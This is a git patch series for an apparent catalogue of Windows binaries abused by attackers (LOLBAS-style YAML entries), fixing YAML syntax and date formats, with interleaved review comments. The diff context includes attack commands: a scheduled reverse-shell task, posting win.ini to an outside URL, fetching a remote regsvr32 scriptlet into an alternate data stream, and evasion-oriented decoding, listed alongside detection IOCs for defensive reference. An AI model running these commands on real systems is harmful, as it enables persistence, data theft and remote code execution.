From de50a47957aa75a5c38c3b1bd83b2e9185222ce7 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 14:46:36 +0000 Subject: [PATCH 01/19] Fix invalid YAML --- yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml | 4 ++-- yml/LOLUtilz/OtherBinaries/aswrundll.yml | 14 ++++++-------- 2 files changed, 8 insertions(+), 10 deletions(-) diff --git a/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml b/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml index e458cec..c0ba77e 100644 --- a/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml +++ b/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml @@ -21,7 +21,7 @@ Detection: Resources: - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html - Link: https://twitter.com/bartblaze/status/1107390776147881984 - Acknowledgement: +Acknowledgement: - Person: Bart - Handle: @bartblaze + Handle: '@bartblaze' --- diff --git a/yml/LOLUtilz/OtherBinaries/aswrundll.yml b/yml/LOLUtilz/OtherBinaries/aswrundll.yml index 72414cc..ce11b14 100644 --- a/yml/LOLUtilz/OtherBinaries/aswrundll.yml +++ b/yml/LOLUtilz/OtherBinaries/aswrundll.yml 
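Review bot: the two fixes in the RunCmd_X64.yml hunk are the right ones (`Acknowledgement:` was indented under the `Resources` list, and `@` is a reserved indicator that cannot start a plain YAML scalar, so `'@bartblaze'` needs the quotes), but nothing prevents the same breakage from being re-introduced: consider adding a YAML lint or schema check in CI that fails on unparseable files, and name the two error classes in the commit message rather than the bare "Fix invalid YAML".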
@@ -1,20 +1,18 @@ Name: aswrundll.exe Description: This process is used by AVAST antivirus to run and execute any modules Author: Eli Salem -Created: 19\03\2019 +Created: 2019-03-19 Commands: - - Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" + - Command: "\"C:\\Program Files\\Avast Software\\Avast\\aswrundll\" \"C:\\Users\\Public\\Libraries\\tempsys\\module.dll\"" Description: Load and execute modules using aswrundll Usecase: Execute malicious modules using aswrundll.exe Category: Execute Privileges: Any OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: -- Path: C:\Program Files\Avast Software\Avast\aswrundll -Code_Sample: -- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"] + - Path: C:\Program Files\Avast Software\Avast\aswrundll Resources: - - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research - Acknowledgement: + - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research +Acknowledgement: - Person: Eli Salem - handle: https://www.linkedin.com/in/eli-salem-954728150 + Handle: https://www.linkedin.com/in/eli-salem-954728150 From 14dca38278f914c153856b157c6ecb52669bbd03 Mon Sep 17 00:00:00 2001 
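Review bot: in the aswrundll.yml hunk, dropping the `Code_Sample:` block outright (the `-Code_Sample:` / `-- Code: [...]` lines) goes further than a YAML fix; the other entries in this series keep an empty `Code_Sample:` / `- Code:` pair, so either retain `Code_Sample:` with an empty `- Code:` here for schema consistency, or state in the commit message that the sample was removed and why. For the new `Command:` value, a single-quoted scalar would carry the Windows paths without doubling every backslash, since single-quoted YAML strings do not process escape sequences: `'"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'`. The `Created: 19\03\2019` to `2019-03-19` conversion is unambiguous, and the `handle:` to `Handle:` key rename matches the other files.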
From: Wietze Date: Sun, 10 Jan 2021 15:04:52 +0000 Subject: [PATCH 02/19] Standardise date formats (see https://yaml.org/type/timestamp.html) --- YML-Template.yml | 6 +++--- yml/LOLUtilz/OSBinaries/Explorer.yml | 2 +- yml/LOLUtilz/OSBinaries/Netsh.yml | 2 +- yml/LOLUtilz/OSBinaries/Nltest.yml | 2 +- yml/LOLUtilz/OSBinaries/Openwith.yml | 2 +- yml/LOLUtilz/OSBinaries/Powershell.yml | 2 +- yml/LOLUtilz/OSBinaries/Psr.yml | 2 +- yml/LOLUtilz/OSBinaries/Robocopy.yml | 2 +- yml/LOLUtilz/OtherBinaries/AcroRd32.yml | 2 +- yml/LOLUtilz/OtherBinaries/Gpup.yml | 2 +- yml/LOLUtilz/OtherBinaries/Nlnotes.yml | 2 +- yml/LOLUtilz/OtherBinaries/Notes.yml | 2 +- yml/LOLUtilz/OtherBinaries/Nvudisp.yml | 2 +- yml/LOLUtilz/OtherBinaries/Nvuhda6.yml | 2 +- yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml | 2 +- yml/LOLUtilz/OtherBinaries/Setup.yml | 2 +- yml/LOLUtilz/OtherBinaries/Usbinst.yml | 2 +- yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml | 2 +- yml/LOLUtilz/OtherMSBinaries/Winword.yml | 4 ++-- yml/LOLUtilz/OtherScripts/Testxlst.yml | 2 +- yml/OSBinaries/At.yml | 10 +++++----- yml/OSBinaries/Atbroker.yml | 6 +++--- yml/OSBinaries/Bash.yml | 6 +++--- yml/OSBinaries/Bitsadmin.yml | 6 +++--- yml/OSBinaries/Certreq.yml | 4 ++-- yml/OSBinaries/Certutil.yml | 6 +++--- yml/OSBinaries/Cmd.yml | 4 ++-- yml/OSBinaries/Cmdkey.yml | 10 +++++----- yml/OSBinaries/Cmstp.yml | 10 +++++----- yml/OSBinaries/ConfigSecurityPolicy.yml | 8 ++++---- yml/OSBinaries/Control.yml | 6 +++--- yml/OSBinaries/Csc.yml | 12 ++++++------ yml/OSBinaries/Cscript.yml | 6 +++--- yml/OSBinaries/Desktopimgdownldr.yml | 8 ++++---- yml/OSBinaries/Dfsvc.yml | 10 +++++----- yml/OSBinaries/Diantz.yml | 12 ++++++------ yml/OSBinaries/Diskshadow.yml | 6 +++--- yml/OSBinaries/Dnscmd.yml | 6 +++--- yml/OSBinaries/Esentutl.yml | 12 ++++++------ yml/OSBinaries/Eventvwr.yml | 4 ++-- yml/OSBinaries/Expand.yml | 8 ++++---- yml/OSBinaries/Explorer.yml | 4 ++-- yml/OSBinaries/Extexport.yml | 8 ++++---- yml/OSBinaries/Extrac32.yml | 12 
++++++------ yml/OSBinaries/Findstr.yml | 8 ++++---- yml/OSBinaries/Forfiles.yml | 8 ++++---- yml/OSBinaries/Ftp.yml | 4 ++-- yml/OSBinaries/GfxDownloadWrapper.yml | 4 ++-- yml/OSBinaries/Gpscript.yml | 8 ++++---- yml/OSBinaries/Hh.yml | 6 +++--- yml/OSBinaries/Ie4uinit.yml | 8 ++++---- yml/OSBinaries/Ieexec.yml | 12 ++++++------ yml/OSBinaries/Ilasm.yml | 6 +++--- yml/OSBinaries/Infdefaultinstall.yml | 6 +++--- yml/OSBinaries/Installutil.yml | 6 +++--- yml/OSBinaries/Jsc.yml | 8 ++++---- yml/OSBinaries/Makecab.yml | 6 +++--- yml/OSBinaries/Mavinject.yml | 6 +++--- yml/OSBinaries/Microsoft.Workflow.Compiler.yml | 10 +++++----- yml/OSBinaries/Mmc.yml | 6 +++--- yml/OSBinaries/MpCmdRun.yml | 10 +++++----- yml/OSBinaries/Msbuild.yml | 8 ++++---- yml/OSBinaries/Msconfig.yml | 6 +++--- yml/OSBinaries/Msdt.yml | 12 ++++++------ yml/OSBinaries/Mshta.yml | 8 ++++---- yml/OSBinaries/Msiexec.yml | 8 ++++---- yml/OSBinaries/Netsh.yml | 6 +++--- yml/OSBinaries/Odbcconf.yml | 6 +++--- yml/OSBinaries/Pcalua.yml | 6 +++--- yml/OSBinaries/Pcwrun.yml | 6 +++--- yml/OSBinaries/Pktmon.yml | 6 +++--- yml/OSBinaries/Presentationhost.yml | 6 +++--- yml/OSBinaries/Print.yml | 6 +++--- yml/OSBinaries/Psr.yml | 8 ++++---- yml/OSBinaries/Rasautou.yml | 8 ++++---- yml/OSBinaries/Reg.yml | 6 +++--- yml/OSBinaries/Regasm.yml | 8 ++++---- yml/OSBinaries/Regedit.yml | 6 +++--- yml/OSBinaries/Regini.yml | 6 +++--- yml/OSBinaries/Register-cimprovider.yml | 6 +++--- yml/OSBinaries/Regsvcs.yml | 4 ++-- yml/OSBinaries/Regsvr32.yml | 6 +++--- yml/OSBinaries/Replace.yml | 12 ++++++------ yml/OSBinaries/Rpcping.yml | 6 +++--- yml/OSBinaries/Rundll32.yml | 8 ++++---- yml/OSBinaries/Runonce.yml | 8 ++++---- yml/OSBinaries/Runscripthelper.yml | 8 ++++---- yml/OSBinaries/Sc.yml | 8 ++++---- yml/OSBinaries/Schtasks.yml | 8 ++++---- yml/OSBinaries/Scriptrunner.yml | 8 ++++---- yml/OSBinaries/Syncappvpublishingserver.yml | 6 +++--- yml/OSBinaries/Ttdinject.yml | 8 ++++---- yml/OSBinaries/Tttracer.yml | 4 ++-- 
yml/OSBinaries/Vbc.yml | 8 ++++---- yml/OSBinaries/Verclsid.yml | 8 ++++---- yml/OSBinaries/Wab.yml | 6 +++--- yml/OSBinaries/Wmic.yml | 6 +++--- yml/OSBinaries/Wscript.yml | 6 +++--- yml/OSBinaries/Wsreset.yml | 8 ++++---- yml/OSBinaries/Wuauclt.yml | 4 ++-- yml/OSBinaries/Xwizard.yml | 8 ++++---- yml/OSLibraries/Advpack.yml | 4 ++-- yml/OSLibraries/Ieadvpack.yml | 2 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/Pcwutl.yml | 4 ++-- yml/OSLibraries/Setupapi.yml | 4 ++-- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Shell32.yml | 2 +- yml/OSLibraries/Syssetup.yml | 4 ++-- yml/OSLibraries/Url.yml | 2 +- yml/OSLibraries/Zipfldr.yml | 2 +- yml/OSLibraries/comsvcs.yml | 8 ++++---- yml/OSScripts/CL_mutexverifiers.yml | 6 +++--- yml/OSScripts/Cl_invocation.yml | 8 ++++---- yml/OSScripts/Manage-bde.yml | 4 ++-- yml/OSScripts/Pubprn.yml | 6 +++--- yml/OSScripts/Syncappvpublishingserver.yml | 6 +++--- yml/OSScripts/Winrm.yml | 4 ++-- yml/OSScripts/pester.yml | 6 +++--- yml/OtherMSBinaries/Agentexecutor.yml | 8 ++++---- yml/OtherMSBinaries/Appvlp.yml | 4 ++-- yml/OtherMSBinaries/Bginfo.yml | 2 +- yml/OtherMSBinaries/Cdb.yml | 4 ++-- yml/OtherMSBinaries/Csi.yml | 2 +- yml/OtherMSBinaries/DefaultPack.yml | 6 +++--- yml/OtherMSBinaries/Devtoolslauncher.yml | 4 ++-- yml/OtherMSBinaries/Dnx.yml | 4 ++-- yml/OtherMSBinaries/Dotnet.yml | 6 +++--- yml/OtherMSBinaries/Dxcap.yml | 6 +++--- yml/OtherMSBinaries/Excel.yml | 4 ++-- yml/OtherMSBinaries/Mftrace.yml | 2 +- yml/OtherMSBinaries/Msdeploy.yml | 2 +- yml/OtherMSBinaries/Msxsl.yml | 2 +- yml/OtherMSBinaries/Ntdsutil.yml | 4 ++-- yml/OtherMSBinaries/Powerpnt.yml | 4 ++-- yml/OtherMSBinaries/Rcsi.yml | 2 +- yml/OtherMSBinaries/Sqldumper.yml | 2 +- yml/OtherMSBinaries/Sqlps.yml | 2 +- yml/OtherMSBinaries/Sqltoolsps.yml | 4 ++-- yml/OtherMSBinaries/Squirrel.yml | 8 ++++---- yml/OtherMSBinaries/Te.yml | 2 +- yml/OtherMSBinaries/Tracker.yml | 2 +- yml/OtherMSBinaries/Update.yml | 8 ++++---- 
yml/OtherMSBinaries/Vsjitdebugger.yml | 4 ++-- yml/OtherMSBinaries/Winword.yml | 4 ++-- yml/OtherMSBinaries/Wsl.yml | 2 +- 147 files changed, 407 insertions(+), 407 deletions(-) diff --git a/YML-Template.yml b/YML-Template.yml index 8fae63d..5b3b17a 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -2,7 +2,7 @@ Name: Binary.exe Description: Something general about the binary Author: The person that created this file -Created: Date the person created this file +Created: Date the person created this file (use YYYY-MM-DD without quotes) Commands: - Command: The command Description: Description of the command @@ -23,9 +23,9 @@ Commands: Full_Path: - Path: c:\windows\system32\bin.exe - Path: c:\windows\syswow64\bin.exe -Code_Sample: +Code_Sample: - Code: http://url.com/git.txt -Detection: +Detection: - IOC: Event ID 10 - IOC: binary.exe spawned Resources: diff --git a/yml/LOLUtilz/OSBinaries/Explorer.yml b/yml/LOLUtilz/OSBinaries/Explorer.yml index 99a6348..cdb2ddd 100644 --- a/yml/LOLUtilz/OSBinaries/Explorer.yml +++ b/yml/LOLUtilz/OSBinaries/Explorer.yml @@ -2,7 +2,7 @@ Name: Explorer.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: explorer.exe calc.exe diff --git a/yml/LOLUtilz/OSBinaries/Netsh.yml b/yml/LOLUtilz/OSBinaries/Netsh.yml index d7dd77f..d6fd688 100644 --- a/yml/LOLUtilz/OSBinaries/Netsh.yml +++ b/yml/LOLUtilz/OSBinaries/Netsh.yml @@ -2,7 +2,7 @@ Name: Netsh.exe Description: Execute, Surveillance Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: | diff --git a/yml/LOLUtilz/OSBinaries/Nltest.yml b/yml/LOLUtilz/OSBinaries/Nltest.yml index e0db5ff..390bc03 100644 --- a/yml/LOLUtilz/OSBinaries/Nltest.yml +++ b/yml/LOLUtilz/OSBinaries/Nltest.yml @@ -2,7 +2,7 @@ Name: Nltest.exe Description: Credentials Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: nltest.exe /SERVER:192.168.1.10 /QUERY 
diff --git a/yml/LOLUtilz/OSBinaries/Openwith.yml b/yml/LOLUtilz/OSBinaries/Openwith.yml index ae20a00..829f41a 100644 --- a/yml/LOLUtilz/OSBinaries/Openwith.yml +++ b/yml/LOLUtilz/OSBinaries/Openwith.yml @@ -2,7 +2,7 @@ Name: Openwith.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: OpenWith.exe /c C:\test.hta diff --git a/yml/LOLUtilz/OSBinaries/Powershell.yml b/yml/LOLUtilz/OSBinaries/Powershell.yml index f8d44e6..eac5ec1 100644 --- a/yml/LOLUtilz/OSBinaries/Powershell.yml +++ b/yml/LOLUtilz/OSBinaries/Powershell.yml @@ -2,7 +2,7 @@ Name: Powershell.exe Description: Execute, Read ADS Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: powershell -ep bypass - < c:\temp:ttt diff --git a/yml/LOLUtilz/OSBinaries/Psr.yml b/yml/LOLUtilz/OSBinaries/Psr.yml index b9b9e45..bf0c3a2 100644 --- a/yml/LOLUtilz/OSBinaries/Psr.yml +++ b/yml/LOLUtilz/OSBinaries/Psr.yml @@ -2,7 +2,7 @@ Name: Psr.exe Description: Surveillance Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip diff --git a/yml/LOLUtilz/OSBinaries/Robocopy.yml b/yml/LOLUtilz/OSBinaries/Robocopy.yml index 8ebb462..a4bc42d 100644 --- a/yml/LOLUtilz/OSBinaries/Robocopy.yml +++ b/yml/LOLUtilz/OSBinaries/Robocopy.yml @@ -2,7 +2,7 @@ Name: Robocopy.exe Description: Copy Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Robocopy.exe C:\SourceFolder C:\DestFolder diff --git a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml index 941436c..0a2b30e 100644 --- a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml +++ b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml 
@@ -2,7 +2,7 @@ Name: AcroRd32.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary diff --git a/yml/LOLUtilz/OtherBinaries/Gpup.yml b/yml/LOLUtilz/OtherBinaries/Gpup.yml index f5824be..ce35964 100644 --- a/yml/LOLUtilz/OtherBinaries/Gpup.yml +++ b/yml/LOLUtilz/OtherBinaries/Gpup.yml @@ -2,7 +2,7 @@ Name: Gpup.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe diff --git a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml index da4d4cd..a66bdba 100644 --- a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml +++ b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml @@ -2,7 +2,7 @@ Name: Nlnotes.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } diff --git a/yml/LOLUtilz/OtherBinaries/Notes.yml b/yml/LOLUtilz/OtherBinaries/Notes.yml index 8ddb03a..79d3bab 100644 --- a/yml/LOLUtilz/OtherBinaries/Notes.yml +++ b/yml/LOLUtilz/OtherBinaries/Notes.yml @@ -2,7 +2,7 @@ Name: Notes.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } diff --git a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml index a7fd86e..b421a69 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml 
@@ -2,7 +2,7 @@ Name: Nvudisp.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Nvudisp.exe System calc.exe diff --git a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml index 9e13364..c6cdbeb 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml @@ -2,7 +2,7 @@ Name: Nvuhda6.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: nvuhda6.exe System calc.exe diff --git a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml index 853d33e..50e4bfb 100644 --- a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml +++ b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml @@ -2,7 +2,7 @@ Name: ROCCAT_Swarm.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe diff --git a/yml/LOLUtilz/OtherBinaries/Setup.yml b/yml/LOLUtilz/OtherBinaries/Setup.yml index 06494de..d777ed7 100644 --- a/yml/LOLUtilz/OtherBinaries/Setup.yml +++ b/yml/LOLUtilz/OtherBinaries/Setup.yml @@ -2,7 +2,7 @@ Name: Setup.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Run Setup.exe diff --git a/yml/LOLUtilz/OtherBinaries/Usbinst.yml b/yml/LOLUtilz/OtherBinaries/Usbinst.yml index 6b2b33c..abcd144 100644 --- a/yml/LOLUtilz/OtherBinaries/Usbinst.yml +++ b/yml/LOLUtilz/OtherBinaries/Usbinst.yml @@ -2,7 +2,7 @@ Name: Usbinst.exe Description: Execute Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" 
diff --git a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml index 77de123..3702e0f 100644 --- a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml +++ b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml @@ -2,7 +2,7 @@ Name: VBoxDrvInst.exe Description: Persistence Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Categories: [] Commands: - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf diff --git a/yml/LOLUtilz/OtherMSBinaries/Winword.yml b/yml/LOLUtilz/OtherMSBinaries/Winword.yml index 43cddf7..579b05a 100644 --- a/yml/LOLUtilz/OtherMSBinaries/Winword.yml +++ b/yml/LOLUtilz/OtherMSBinaries/Winword.yml @@ -2,7 +2,7 @@ Name: winword.exe Description: Document editor included with Microsoft Office. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: winword.exe /l dllfile.dll Description: Launch DLL payload. @@ -26,4 +26,4 @@ Acknowledgement: Handle: '@@vysecurity' - Person: Adam (Internals) Handle: '@Hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/LOLUtilz/OtherScripts/Testxlst.yml b/yml/LOLUtilz/OtherScripts/Testxlst.yml index 3cf7399..05eb340 100644 --- a/yml/LOLUtilz/OtherScripts/Testxlst.yml +++ b/yml/LOLUtilz/OtherScripts/Testxlst.yml @@ -2,7 +2,7 @@ Name: testxlst.js Description: Script included with Pywin32. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index fa3d443..5d32b60 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml 
@@ -2,12 +2,12 @@ Name: At.exe Description: Schedule periodic tasks Author: 'Freddie Barr-Smith' -Created: '2019-09-20' +Created: 2019-09-20 Commands: - Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe - Description: Create a recurring task to execute every day at a specific time. + Description: Create a recurring task to execute every day at a specific time. Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive - Category: Execute + Category: Execute Privileges: Local Admin MitreID: T1053 MitreLink: https://attack.mitre.org/wiki/Technique/T1053 @@ -17,10 +17,10 @@ Full_Path: - Path: C:\WINDOWS\SysWOW64\At.exe Detection: - IOC: Scheduled task is created - - IOC: Windows event log - type 3 login + - IOC: Windows event log - type 3 login - IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) - IOC: C:\Windows\Tasks\At1.job - - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. + - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. Resources: - Link: https://freddiebarrsmith.com/at.txt - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 013ea5b..897f5f0 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -2,7 +2,7 @@ Name: Atbroker.exe Description: Helper binary for Assistive Technology (AT) Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). 
@@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration @@ -26,4 +26,4 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 4b34149..6ecdfe8 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -2,7 +2,7 @@ Name: Bash.exe Description: File used by Windows subsystem for Linux Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe @@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Child process from bash.exe @@ -50,4 +50,4 @@ Acknowledgement: Handle: '@aionescu' - Person: Asif Matadar Handle: '@d1r4c' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9b0b5e6..dfcc005 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -2,7 +2,7 @@ Name: Bitsadmin.exe Description: Used for managing background intelligent transfer Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. 
@@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\bitsadmin.exe - Path: C:\Windows\SysWOW64\bitsadmin.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Child process from bitsadmin.exe @@ -56,4 +56,4 @@ Acknowledgement: Handle: '@carnal0wnage' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index b9a69bf..4cd1e84 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -2,7 +2,7 @@ Name: CertReq.exe Description: Used for requesting and managing certificates Author: 'David Middlehurst' -Created: '2020-07-07' +Created: 2020-07-07 Commands: - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: certreq creates new files diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index d66a264..081f515 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -2,7 +2,7 @@ Name: Certutil.exe Description: Windows binary used for handeling certificates Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe Description: Download and save 7zip to disk in the current folder. 
@@ -44,7 +44,7 @@ Commands: MitreID: T1140 MitreLink: https://attack.mitre.org/wiki/Technique/T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil --decodehex encoded_hexadecimal_InputFileName + - Command: certutil --decodehex encoded_hexadecimal_InputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Usecase: Decode files to evade defensive measures Category: Decode @@ -55,7 +55,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Certutil.exe creating new files on disk diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 1fc9f9f..1d08c32 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -2,7 +2,7 @@ Name: Cmd.exe Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' -Created: '2019-06-26' +Created: 2019-06-26 Commands: - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat Description: Add content to an Alternate Data Stream (ADS). @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: cmd.exe executing files from alternate data streams. diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index a3b4136..e499adc 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -1,8 +1,8 @@ --- -Name: Cmdkey.exe +Name: Cmdkey.exe Description: creates, lists, and deletes stored user names and passwords or credentials. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cmdkey /list Description: List cached credentials 
